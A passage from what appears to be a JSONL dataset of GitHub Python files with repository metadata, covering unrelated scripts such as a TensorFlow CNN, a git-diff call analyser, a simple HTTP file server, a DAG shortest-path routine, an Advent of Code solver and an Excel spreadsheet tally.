len(p2)\n\n    if x == y:\n        if p1 == p2:\n            z = \"0D\"\n        else:\n\n            diferentes = 0\n            i = 0\n            while i < x:\n                if p1[i] != p2[i]:\n                    diferentes = diferentes + 1\n                i = i + 1\n            if diferentes > 1 :\n                z = \"+1\"\n            else:\n                z = \"1S\"\n    else:\n        if x > y :\n            mayor = p1\n            menor = p2\n        elif x < y:\n            mayor = p2\n            menor = p1\n        if (len(mayor) - len(menor)) == 1:\n            i = 0\n            while i < len(menor) and mayor[i] == menor[i]:\n                i = i + 1\n            if mayor[:i] + mayor[i+1:] == menor:\n                z = \"IB\"\n            else:\n                z = \"+1\"\n        else:\n            z = \"+1\"\n\n\n    return z","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_b50e613b5beb17438691584128739204.py","file_name":"tema10_ej2_b50e613b5beb17438691584128739204.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"73361275449","text":"import tensorflow as tf\nimport numpy as np\nfrom dataset.DataSets2 import ds\n\ndef get_dict(database):\n    xs,ys = database.NextTrainingBatch()\n    return {x:xs, y_desired:ys}\n\ntrain = ds.DataSets2('/Users/fabienfluro/Documents/MS_BGD/Fil_Rouge/Work/Gender_CNN/data/...train')\ntest = ds.DataSets2('/Users/fabienfluro/Documents/MS_BGD/Fil_Rouge/Work/Gender_CNN/data/...test')\n\nwith tf.name_scope('input'):\n    x = tf.placeholder(tf.float32, [None, None], name='x')\n    y_desired = tf.placeholder(tf.float32, [None, 2], name='y_desired')\n\n\n\n# sess = tf.Session()\n# sess.run(tf.global_variables_initializer())\n\n# data, labels = train.NextTrainingBatch(sess)\n\n\n# sess.close()\n\n# print(data)\n# print(labels)\n\n\n# print(np.shape(images_data[0][0]))\n# print('data:')\n# print(images_data[0])\n# print('labels:')\n# print(images_data[1])\n\n\n# print(np.shape(images_data))\n\n# plt.imshow(data[0])\n# plt.show()","repo_name":"fab971/CNN-Gender","sub_path":"src/sandbox3.py","file_name":"sandbox3.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20212379525","text":"# This script compares RF-IC register setting values.\n# For tips on treating C-style struct data in Python3, see: [PythonでバイナリをあつかうためのTips](https://qiita.com/pashango2/items/5075cb2d9248c7d3b5d4)\n\nimport dataclasses\nimport ctypes\nfrom typing import List\n\nLOG_BUF_LEN = 200\n\nclass SerialCommand_C(ctypes.Structure):\n    _pack_ = 2\n    _fields_ = (\n        ('cmd1', ctypes.c_uint16),\n        ('cmd2', ctypes.c_uint16),\n        ('data1', ctypes.c_uint16),\n        ('data2', ctypes.c_uint16),\n    )\n\nclass SerialCommandHistory(ctypes.Structure):\n    _pack_ = 2\n    _fields_ = (\n        ('numEntry', ctypes.c_uint16),\n        ('buf', SerialCommand_C * LOG_BUF_LEN)\n    )\n\n@dataclasses.dataclass\nclass RfIcRegVal():\n    sysId: int\n    regAddr: int\n    val: int\n\ndef loadData(path: str) -> List[RfIcRegVal]:\n    DEV_ID_FOO = 0x0B\n\n    serialCommandHistory = SerialCommandHistory()\n\n    with open(path, 'rb') as file:\n        file.readinto(serialCommandHistory)\n\n    numEntry = serialCommandHistory.numEntry\n    historyBuf = serialCommandHistory.buf\n    rfIcRegVals: List[RfIcRegVal] = []\n\n    for entry in historyBuf:\n        devId = entry.cmd1>>8\n        if devId == DEV_ID_FOO:\n            sysId = 0\n            regAddr = (entry.data2>>8)&0x0FF\n            val = entry.data2&0x0FF\n            rfIcRegVals.append(RfIcRegVal(sysId, regAddr, val))\n\n    return rfIcRegVals\n\nFILE_PATH_SerialCommandHistory_1 = \"C:/serialCommandHistory.bin\"\ngrfIcRegVals_1 = loadData(FILE_PATH_SerialCommandHistory_1)\n","repo_name":"motchy869/code-fractions","sub_path":"Neumann-type-computer/computer-science/binary-data-operation/read_C-style_structure.py","file_name":"read_C-style_structure.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25137705076","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\n\n\nclass xxxxx(SimpleHTTPRequestHandler):\n\n    def do_GET(self):\n        path = self.translate_path(self.path)\n        f = None\n        try:\n            f = open(path, 'rb')\n        except OSError:\n            self.path = '/'\n            ff = self.send_head()\n            self.copyfile(ff, self.wfile)\n            ff.close()\n            return\n        finally:\n            if f:\n                f.close()\n\n        f = self.send_head()\n        if f:\n            try:\n                self.copyfile(f, self.wfile)\n            finally:\n                f.close()\n\n\ndef run(server_class=HTTPServer, handler_class=xxxxx):\n    server_address = ('0.0.0.0', 22222)\n    httpd = server_class(server_address, 
handler_class)\n httpd.serve_forever()\n\n\nrun()\n","repo_name":"filipagh/cmms","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1285727889","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime\nimport time\n\nimport tensorflow as tf\nimport numpy as np\n\nimport random\n\nDim = 5\nNN = Dim*Dim*Dim \nfilename = 'Data_'+str(Dim)\nfile0 = open(filename,'r')\nlines = file0.readlines()\nN = len(lines)\nN = 200000\nfrom random import shuffle\n\n\n\ndef weight_variable(shape):\n\t\n\tinitial = tf.truncated_normal(shape,mean = 0,stddev = 0.01)\n\treturn tf.Variable(initial)\n\ndef bias_variable(shape):\n\t\n\tinitial = tf.constant(0.01,shape=shape)\n\treturn tf.Variable(initial)\n\ndef conv3d(x,W):\n\t\n\treturn tf.nn.conv3d(x,W,strides=[1,1,1,1,1],padding='SAME')\n\t\ndef max_pool_3x3(x):\n\n\treturn tf.nn.max_pool3d(x,ksize = [1,3,3,3,1],strides=[1,2,2,2,1],padding='VALID')\n\nX = tf.placeholder('float',[None,Dim,Dim,Dim,1])\nY = tf.placeholder('float',[None,2])\n\nW_conv1 = weight_variable([2,2,2,1,20])\nb_conv1 = bias_variable([20])\nh_conv1 = tf.nn.relu(conv3d(X, W_conv1) + b_conv1)\nh_pool1 = max_pool_3x3(h_conv1)\n\nW_conv2 = weight_variable([2,2 ,2, 20,32])\nb_conv2 = bias_variable([32])\nh_conv2 = tf.nn.relu(conv3d(h_pool1, W_conv2) + b_conv2)\n#h_pool2 = max_pool_2x2(h_conv2)\n\n\nW_fc1 = weight_variable([2*2*2*32, 200])\nb_fc1 = bias_variable([200])\n\nh_pool2_flat = tf.reshape(h_conv2, [-1, 2*2*2*32])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\nW_fc2 = weight_variable([200, 2])\nb_fc2 = bias_variable([2])\nh_fc2 = tf.nn.relu(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\ny_conv=tf.nn.softmax(h_fc2)\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nsaver = tf.train.Saver()\n\nwrite = tf.summary.FileWriter('.')\nwrite.add_graph(tf.get_default_graph())\n\nsaver.restore(sess,\"./model/my_checkpoint\")\n\n","repo_name":"zhangfeiyang/mm_trigger_machine_learning","sub_path":"draw_model.py","file_name":"draw_model.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37055064012","text":"\"\"\"\n @file user_git_diff.py\n @brief\n User git diff logic. Get user's working data, calling data, and user's last commit data.\n\"\"\"\nfrom pathlib import Path\nimport os\nimport json\nimport ast\n\nclass user_git_info:\n\n # Constructor\n def __init__(self, content):\n self.content = content\n\n for proj_name_temp in self.content['git_diff'].keys():\n self.proj_name = proj_name_temp\n\n self.user_name = self.content['git_id']\n\n # getters\n def get_proj_name(self):\n return self.proj_name\n\n\n def get_user_name(self):\n return self.user_name\n\n\n def get_working_data(self):\n\n # working_list = [ [\"file_name\", \"logic_name\", \"work_line\", \"work_amount\"], [\"file_name\", \"logic_name\", \"work_line\", \"work_amount\"], ... 
]\n        working_list = []\n\n        # get file dict\n        temp_work_data_dict = self.content['git_diff'][self.proj_name]\n\n        for file_name in temp_work_data_dict.keys():\n\n            logic_list = temp_work_data_dict[file_name]\n            # search each file name and each logic name\n            # temp_work = [\"file_name\", \"logic_name\", \"work_line\", \"work_amount\"]\n            for temp_logic in logic_list:\n                temp_work = []\n                temp_work.append(file_name.replace('\\\\', '/')) # file_name\n                temp_work.append(temp_logic[0]) # logic_name\n                temp_work.append(temp_logic[1]) # work_line\n                temp_work.append(temp_logic[2]) # work_amount\n\n                # append temp_work\n                working_list.append(temp_work)\n\n        return working_list\n\n    def get_edit_amount(self):\n\n        edit_amount = dict()\n\n        # get edit_amount\n        for file_name, temp_amount in self.content['total_plus'].items():\n            edit_amount[file_name] = dict()\n            edit_amount[file_name]['total_plus'] = temp_amount\n            edit_amount[file_name]['total_minus'] = self.content['total_minus'][file_name]\n            edit_amount[file_name]['git_diff_code'] = self.get_git_diff_info(file_name)\n\n        return edit_amount\n\n    def get_git_diff_info(self, file_name):\n        git_diff_info = self.content['git_diff_info'][file_name]\n\n        git_diff_code = \"|||\".join(git_diff_info).replace(\"'\", \"\\\\'\")\n        print(\"get_git_diff_info\", git_diff_code)\n\n        return git_diff_code\n\n\n    def get_git_diff_code(self, file_name):\n        minus_list = self.content['minus_list'][file_name]\n        plus_list = self.content['plus_list'][file_name]\n        modify_file = self.content['modify_file'][file_name]\n\n        git_diff_code = \"\"\n        git_diff_file = []\n\n        for idx, line in enumerate(modify_file):\n            git_diff_file.append(line)\n            # print(idx, line)\n\n        # If the 105th line was modified, the - goes at the 104th entry and the + at the 105th\n        for code, line in plus_list:\n            git_diff_file[line - 1] = \"+\" + str(code) + \"\\n\"\n            # print(\"plus\", line, git_diff_file[line - 1])\n\n        for code, line in minus_list:\n            git_diff_file[line] = \"-\" + str(code) + \"\\n\" + git_diff_file[line]\n            # print(\"minus\", line, git_diff_file[line])\n\n        # for idx, code in enumerate(git_diff_file):\n        #     print(idx + 1, code)\n\n        git_diff_code = \"|||\".join(git_diff_file).replace(\"'\", \"\\\\'\")\n\n        return git_diff_code\n\n    def get_calling_data(self):\n        call_dict = dict()\n        calling_dict = dict()\n        project_name = self.proj_name[:-4]\n\n        for file_name, context_temp in self.content['modify_file'].items():\n            call_dict[file_name] = dict()\n            calling_dict[file_name] = dict()\n            context = context_temp\n            parse_tree = ast.parse(''.join(context))\n\n            import_table = dict()\n            import_from_table = dict()\n            self.extract_call(parse_tree, import_table, import_from_table, call_dict[file_name])\n\n            for plus_temp in self.content['plus_list'][file_name]:\n                if plus_temp[1] in call_dict[file_name].keys():\n                    for call_dict_context in call_dict[file_name][plus_temp[1]]:\n                        if call_dict_context is not None:\n                            call_context = call_dict_context.split(\".\")\n                            func_name = call_context[-1]\n                            file_path_and_class_context = call_context[:-1]\n                            file_path = \"\"\n                            class_context = []\n                            while file_path_and_class_context:\n                                print(os.path.join(os.path.pardir, project_name, \"/\".join(file_path_and_class_context)) + \".py\")\n                                if os.path.exists(os.path.join(os.path.pardir, project_name, \"/\".join(file_path_and_class_context)) + \".py\"):\n                                    file_path = os.path.join(project_name, \"/\".join(file_path_and_class_context)) + \".py\"\n                                    break\n                                class_context.append(file_path_and_class_context[-1])\n                                file_path_and_class_context.pop()\n\n                            # Include call in same file\n                            if not file_path:\n                                file_path = file_name\n                            if 
plus_temp[1] not in calling_dict[file_name].keys():\n calling_dict[file_name][plus_temp[1]] = []\n calling_dict[file_name][plus_temp[1]].append({\"file_path\": file_path, \"class_context\": class_context[::-1], \"func_name\": func_name})\n\n # # Except call in same file\n # if file_path:\n # calling_dict[file_name][plus_temp[1]] = {\"file_path\": file_path, \"class_context\": class_context, \"func_name\": func_name}\n\n for file_name, temp_calling_list in calling_dict.items():\n for line_num, temp_calling_list_list in temp_calling_list.items():\n for temp_calling in temp_calling_list_list:\n temp_logic = \"\"\n if temp_calling['class_context']:\n temp_logic += \"class\"\n for temp_class in temp_calling['class_context']:\n temp_logic += \":\" + temp_class\n temp_logic += \":\" + temp_calling['func_name']\n\n else:\n temp_logic += \"function:\" + temp_calling['func_name']\n temp_calling['logic'] = temp_logic\n\n for file_name, call_list_dict in calling_dict.items():\n print(\"Final calling\", file_name, \" : \", calling_dict[file_name])\n\n return calling_dict\n\n\n def extract_call(self, node, import_table, import_from_table, call_list_dict, assign_dict=dict()):\n for each in node.body:\n\n if isinstance(each, ast.FunctionDef):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.ClassDef):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.For):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.While):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.If):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.With):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.Assign):\n if isinstance(each.value, ast.Call):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n names.append(name.id)\n\n for keyword in each.value.keywords:\n if isinstance(keyword.value, ast.Call):\n stack = self.get_extract_call_logic(keyword.value.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n for arg in each.value.args:\n if isinstance(arg, ast.Call):\n stack = self.get_extract_call_logic(arg.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n stack = self.get_extract_call_logic(each.value.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n elif isinstance(each.value, ast.BinOp):\n if isinstance(each.value.left, ast.Call):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n if name.id in assign_dict:\n del assign_dict[name.id]\n names.append(name.id)\n stack = self.get_extract_call_logic(each.value.left.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n if isinstance(each.value.right, ast.Call):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n if name.id in assign_dict:\n del 
assign_dict[name.id]\n names.append(name.id)\n stack = self.get_extract_call_logic(each.value.right.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n if isinstance(each.value.left, ast.Name) or isinstance(each.value.right, ast.Name):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n if name.id in assign_dict:\n del assign_dict[name.id]\n names.append(name.id)\n if isinstance(each.value.left, ast.Name) :\n cur = each.value.left\n elif isinstance(each.value.right, ast.Name):\n cur = each.value.right\n\n stack = []\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n list = stack[0].split('.')[:-1]\n class_name = \".\".join(list)\n check = 0\n for key, ele in assign_dict.items():\n if ele == class_name:\n check = 1\n\n if check == 0:\n class_name = stack[0]\n\n for name in names:\n assign_dict[name] = class_name\n call_list_dict[each.lineno] = class_name\n\n elif isinstance(each, ast.Expr):\n if isinstance(each.value, ast.Call):\n for keyword in each.value.keywords:\n if isinstance(keyword.value, ast.Call):\n stack = []\n cur = keyword.value.func\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n if not isinstance(cur, ast.Name):\n continue\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id,cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n for arg in each.value.args:\n if isinstance(arg, ast.Call):\n stack = []\n cur = arg.func\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n if not isinstance(cur, ast.Name):\n continue\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n stack = []\n cur = each.value.func\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n if not isinstance(cur, ast.Name):\n continue\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n elif isinstance(each, ast.Import):\n for name in each.names:\n if name.asname != None:\n import_table[name.asname] = name.name\n\n elif isinstance(each, ast.ImportFrom):\n module = each.module\n for name in each.names:\n if 
name.asname == None:\n import_from_table[name.name] = module + '.' + name.name\n else:\n import_from_table[name.asname] = module + '.' + name.name\n\n def get_extract_call_logic(self, cur, import_table, import_from_table, assign_dict, names):\n stack = []\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n\n if not isinstance(cur, ast.Name):\n return\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n for name in names:\n assign_dict[name] = stack\n\n return stack\n\n def get_last_commit_data(self):\n last_commit_date = \"\"\n git_log_name_only = self.content['git_log_name_only']\n for line in git_log_name_only:\n if line[:5] == 'Date:':\n last_commit_date = line\n break\n\n return last_commit_date\n\n def get_log_file_list(self):\n log_file_list = []\n git_log_name_only = self.content['git_log_name_only']\n\n pos_check = 0\n row = []\n for line in git_log_name_only:\n if line == '':\n pos_check += 1\n pos_check %= 3\n if pos_check == 0:\n log_file_list.insert(0, row)\n row = []\n continue\n\n if pos_check == 2:\n if line[:7] == 'commit ':\n pos_check = 0\n continue\n row.append(line)\n\n if row:\n log_file_list.insert(0, row)\n\n return log_file_list\n","repo_name":"codingsoo/conflict-prediction","sub_path":"server_dir/user_git_diff.py","file_name":"user_git_diff.py","file_ext":"py","file_size_in_byte":18151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"25687600211","text":"from promax.infrastructure.promax.request_object import RequestObject\nimport logging\n\nlogger = logging.getLogger()\n\n\nclass OrderHistoryByOrderIdRequest(RequestObject):\n\n def __init__(self, unb, cnpj, order_id):\n self.unb = unb\n self.cnpj = cnpj\n self.Usuario = \"menucomvc\"\n self.idPedidoFacil = order_id\n\n @property\n def payload(self):\n payload = \"nrCnpj={cnpj}&ppopcao=55&idTabela=3&&idPedidoFacil={idPedidoFacil}&requisicao=9&opcao=12&idEntregue=S&idAberto=S&idFaturado=S&idAgendado=S&siteV2=S\"\"&unb={unb}&Usuario={Usuario}\".format(\n unb=self.unb, cnpj=self.cnpj, Usuario=self.Usuario, idPedidoFacil=self.idPedidoFacil)\n return payload\n","repo_name":"pfpacheco/menu-sun-api","sub_path":"promax/infrastructure/promax/order_history_by_order_id_request.py","file_name":"order_history_by_order_id_request.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43498496330","text":"import sys\r\nimport ReadGraphFromFile\r\nimport TopologicalSorting\r\n\r\n\r\ndef DAG(start, someList):\r\n length = len(someList)\r\n distance = [sys.maxsize] * length\r\n tati = [-1] * length\r\n distance[start] = 0\r\n\r\n sort_top = TopologicalSorting.topologicalSorting(someList)\r\n for x in sort_top:\r\n for i in someList[x]:\r\n if distance[x] + i[1] < distance[i[0]]:\r\n distance[i[0]] = distance[x] + i[1]\r\n tati[i[0]] = x\r\n result = []\r\n for i in sort_top:\r\n result.append((i, distance[i]))\r\n return result\r\n\r\n\r\nm, n, listAlg = ReadGraphFromFile.readWeightedFile()\r\nlista = ReadGraphFromFile.listaAdiacenta(n, listAlg, \"orientat\")\r\n\r\nprint(DAG(0, 
lista))\r\n","repo_name":"Fusneica-FlorentinCristian/FMI-UniBuc","sub_path":"Anul-II/Sem-I/Alg-Fundam/Random/Fundamental Algorithms Matei/Algorithms/DAG.py","file_name":"DAG.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4173835562","text":"'''Calculate the total required mass for Santa's sleigh modules.'''\nimport sys\nimport math\nimport logging\n\nlogging.basicConfig(format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.WARNING)\n\ndef calculate_total_mass(module):\n '''Performs the actual calculation'''\n\n if isinstance(module, list):\n return sum([calculate_total_mass(i) for i in module])\n\n def calculate_fuel_weight_for_mass(mass):\n logging.info('mass weighs: %s', mass)\n\n def calculate_fuel(i):\n fuel = math.floor(i / 3.0) - 2\n return max(fuel, 0)\n\n required = calculate_fuel(mass)\n additional = calculate_total_mass(required) if required > 0 else 0\n\n logging.info('required fuel for mass of size %s is %s', mass, required)\n\n return required + additional\n\n fuel_required = calculate_fuel_weight_for_mass(module)\n return fuel_required\n\nif __name__ == '__main__':\n ARGUMENTS = [int(i) for i in sys.argv[1:]]\n print(calculate_total_mass(ARGUMENTS))\n","repo_name":"drfiresign/advent-of-code","sub_path":"2019/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17232553658","text":"import json\n\nfrom webauth import auth\nfrom sqlalchemy import text, select\nfrom flask import Blueprint, jsonify, Response\nfrom database import db_session\nfrom flask_restx import fields, Resource, Namespace\n\napi = Namespace('events', \"Event related operations\")\n\nevent_model = api.model('EventModel', {\n 'Id': fields.String(description='ID of the Event'),\n 'EventCode': fields.String(description='Event Code for the Event'),\n 'Timestamp': fields.String(description='Timestamp the Event'),\n 'SecretId': fields.String(description='ID of the secret contained in the Event'),\n})\n\ndef parse_to_event(row):\n return {\n 'Id': row[0],\n 'EventCode': row[1],\n 'Timestamp': row[2].isoformat(),\n 'SecretId': row[3]\n }\n\n\n@api.route(\"/\")\nclass GetAllEvents(Resource):\n @api.doc(\n \"Get All Events\",\n responses={\n 200: \"Event Data Found\",\n 404: \"No Events Found\",\n },\n )\n @api.response(200, \"Event Data Found\", event_model)\n @api.response(400, \"No Events Found\")\n @api.doc(security=\"basicAuth\")\n @auth.login_required\n def get(self):\n from views.secrets import get_secrets_for_user\n result = db_session.execute(text(\"Select * from vault.v_SecretEvents limit 100;\")).all()\n secrets = list(i[0] for i in get_secrets_for_user(auth.current_user()))\n filtered_events = list(i for i in result if i[3] in secrets)\n return Response(response=json.dumps([parse_to_event(r) for r in filtered_events]),\n status=(200 if len(result) > 0 else 404),\n mimetype='application/json')\n","repo_name":"nyuak4769/CSGY6803_Final","sub_path":"web/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29742099953","text":"import greeter_server\nfrom bali.core import Bali\nfrom v1.app import router\n\napp = Bali(\n base_settings=None,\n routers=[{\n 'router': router,\n 'prefix': '/v1',\n }],\n 
backend_cors_origins=['http://127.0.0.1'],\n rpc_service=greeter_server,\n)\napp.settings(title='Bali App')\n\nif __name__ == \"__main__\":\n app.start()\n","repo_name":"Alex-xujiale/bali","sub_path":"examples/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"536350308","text":"import re\nfrom os import path\nfrom sys import argv\nimport numpy as np\nfrom yachalk import chalk\n\ndef file_path(file):\n return \"%s/%s\" % (path.dirname(argv[0]) if path.dirname(argv[0]) else \".\", file)\n\ndef load(file):\n return [list(map(int, list(l))) for l in open(file_path(file), \"r\").read().split(\"\\n\")]\n\ndef ex1(data):\n visible = len(data[0]) * 2 + (len(data)-2)*2\n for j in range(1, len(data) - 1):\n for i in range(1, len(data[0]) - 1):\n if all(map(lambda x: x < data[j][i], data[j][0:i])) or \\\n all(map(lambda x: x < data[j][i], data[j][i+1:len(data[0])])) \\\n or all(map(lambda x: x < data[j][i], list(map(lambda x: x[i], data[:j])))) \\\n or all(map(lambda x: x < data[j][i], list(map(lambda x: x[i], data[j+1:])))):\n visible += 1\n return visible\n\ndef cprint(lines, m, n):\n for j in range(len(lines)):\n for i in range(len(lines[0])):\n if m == i and n == j:\n print(chalk.red(lines[j][i]), end=\"\")\n else:\n print(lines[j][i], end=\"\")\n print(\"\")\n\n\ndef view(data, current_tree, direction):\n trees_viewed = 0\n i, j = current_tree\n tree_height = data[j][i]\n \n while True:\n i += direction[0]\n j += direction[1]\n if not(0 <= i < len(data[0])) or not(0 <= j < len(data)) :\n break\n trees_viewed += 1\n\n if data[j][i] >= tree_height:\n break\n return trees_viewed\n\n\ndef ex2(data):\n highscore = 0\n for j in range(0, len(data)):\n for i in range(0, len(data[0])):\n score = view(data, (i, j), (0, -1))*view(data, (i, j), (-1, 0))*view(data, (i, j), (1, 0))*view(data, (i, j), (0, 1))\n if score > highscore:\n highscore = score\n return highscore\n\nsample_data = load(\"sample.txt\")\nassert ex1(sample_data) == 21\n\ndata = load(\"input.txt\")\nprint(\"ex1 : %s\" % ex1(data))\n\nassert ex2(sample_data) == 8\nprint(\"ex2 : %s\" % ex2(data))","repo_name":"pataluc/AoC","sub_path":"2022/day08/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25508290238","text":"import openpyxl\nimport pprint as pp\nimport time\nfrom appium import webdriver\nfrom selenium import webdriver\nfrom typing import Optional\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.firefox.options import Options as Op\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait as W\nfrom selenium.webdriver.support import expected_conditions as E\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.firefox.service import Service\nfrom webdriver_manager.firefox import GeckoDriverManager\n\n# открываем файл Excel\nfilename = 'altayka.xlsm'\nsubcategory_dict = {}\nworkbook = openpyxl.load_workbook(filename, data_only=True)\n\n# выбираем нужный лист\nsheet = workbook['1']\n\n# Чтение содержимого ячеек по заданным диапазонам(строка, столбец)\nmax_rows = sheet.max_row\nfor i in range(14, max_rows + 1):\n ordinal_number = sheet.cell(row=i, column=1).value\n 
sku = sheet.cell(row=i, column=25).value\n subcategory = sheet.cell(row=i, column=4).value\n # Пропуск печати пустых ячеек\n if not sku:\n continue\n # Нумерация\n if not ordinal_number:\n break\n # Добавление к одинаковым ключам, разные значения (в столбец)\n if subcategory not in subcategory_dict:\n subcategory_dict[subcategory] = [sku]\n else:\n subcategory_dict[subcategory].append(sku)\n\n # Печать в столбик (ключ + все его значения)\n\n\n# pp.pprint(subcategory_dict)\n# print(subcategory_dict)\n\ndef summ_numbers_key():\n \"Суммирование значений одинаковых ключей\"\n my_dict = subcategory_dict\n my_dict['восп'] = sum(my_dict['восп'])\n my_dict['оп'] = sum(my_dict['оп'])\n my_dict['увп'] = sum(my_dict['увп'])\n my_dict['завед'] = sum(my_dict['завед'])\n my_dict['пр пп'] = sum(my_dict['пр пп'])\n print(my_dict)\n\n\ncount1 = count2 = count3 = count4 = count5 = count6 = count7 = count8 = count9 = count10 = \\\n count11 = count12 = count13 = count14 = count15 = count16 = 0\n\nfor values in subcategory_dict.values():\n for value in values:\n if value < 16000:\n count1 += value\n count1 = round(count1, 2)\n elif 16242.1 < value < 18680.0:\n count2 += value\n elif 18680.1 < value < 19490.0:\n count3 += value\n elif 19490.1 < value < 20300.0:\n count4 += value\n elif 20300.1 < value < 21110.0:\n count5 += value\n elif 21110.1 < value < 23550.0:\n count6 += value\n elif 23550.1 < value < 24360.0:\n count7 += value\n elif 24360.1 < value < 25990.0:\n count8 += value\n elif 25990.1 < value < 27610.0:\n count9 += value\n elif 27610.1 < value < 29240.0:\n count10 += value\n elif 29240.1 < value < 30860.0:\n count11 += value\n elif 30860.1 < value < 32480.0:\n count12 += value\n elif 32480.1 < value < 34110.0:\n count13 